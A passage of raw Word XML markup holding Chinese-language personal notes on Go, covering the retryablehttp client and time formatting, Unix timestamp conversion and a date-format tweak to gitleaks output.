        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端接口。它是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>标准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>net/http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端库的精简包装，并公开几乎相同的公共</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>retryablehttp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非常容易放入现有程序中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B35D25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Retryablehttp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某些条件下执行自动重试。通常，如果客户端返回错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接错误等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者如果接收到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范围的响应代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(501</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则在等待一段时间后调用重试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71095A8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE4258D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6181409A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36983E7F" w14:textId="1A209F15" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="332" w:name="_Toc159779789"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:bookmarkEnd w:id="332"/>
    </w:p>
    <w:p w14:paraId="09A24CDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="326B224F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://books.studygolang.com/The-Golang-Standard-Library-by-Example/chapter04/04.3.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531005BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B92A15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fmt.Println(time.Now().Unix())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62903C39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println(time.Now().Format("2006-01-02 15:04:05")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52633351" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>这是个奇葩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>时间格式化格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>必须是这个时间点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>据说是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>诞生之日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>记忆方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>:6-1-2-3-4-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B497BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 2014-01-07 09:42:20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252E54C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7625D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算时间差后格式化时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389665A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>昨天此时的时间，按照年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日的格式创建文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC66226" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yesterdayTime := time.Now().</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>AddDate(0, 0, -1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B04BA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yesterdayTime_YmdHMS := yesterdayTime.Format("2006-01-02 15:04:05")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43525B32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yesterdayTime_Ymd := yesterdayTime.Format("2006_01_02")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498162BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yesterdayTime_Ym := yesterdayTime.Format("2006_01")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B58A69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同步开始时间为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%s\n", yesterdayTime_YmdHMS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B95E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14022B11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323AD97C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B62744" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原本的写法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650D1E8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">finding.Date = </w:t>
      </w:r>
      <w:bookmarkStart w:id="333" w:name="OLE_LINK6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f.PatchHeader.AuthorDate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="333"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>UTC().Format(time.RFC3339)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43596EDF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我改为了如下来输出中国时间：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF3993" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>finding.Date = f.PatchHeader.AuthorDate.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Format("2006-01-02 15:04:05")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5250B111" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA5ABE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> f.PatchHeader.AuthorDate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> time.Time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC05E68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F2C37A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>时间戳转</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C41F75D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49BB6EAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str_time := time.Unix(1389058332, 0).Format("2006-01-02 15:04:05")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369185B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fmt.Println(str_time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C29C8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 2014-01-07 09:32:12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFC0750" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化时间转时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B17636" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D10A98B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>the_time := time.Date(2014, 1, 7, 5, 50, 4, 0, time.Local)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43450E9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unix_time := the_time.Unix()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4E8410" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fmt.Println(unix_time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D2A4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 389045004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BC0F81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AABB1A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>time.Parse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB8C85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26DA81EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>the_time, err := time.Parse("2006-01-02 15:04:05", "2014-01-08 09:04:41")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B6BF4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if err == nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5F040" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        unix_time := the_time.Unix()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E83B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(unix_time)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BFF3B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F5DDCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 1389171881</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4A8991" w14:textId="50CB1FBE" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8D98B6" w14:textId="31D204CB" w:rsidR="0089378D" w:rsidRDefault="0089378D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610EA919" w14:textId="3BC63835" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Before</w:t>
      </w:r>
      <w:r>
        <w:t>()  Equal()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CF01B4" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRPr="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246EE585" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D67DE8F" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1EA1E" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>time1 := "2021-03-19 09:23:29"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240F5665" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>time2 := "2021-03-20 08:50:29"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B721DD4" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先把时间字符串格式化成相同的时间类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF569C" w14:textId="77777777" w:rsidR="00276F2B" w:rsidRDefault="00276F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
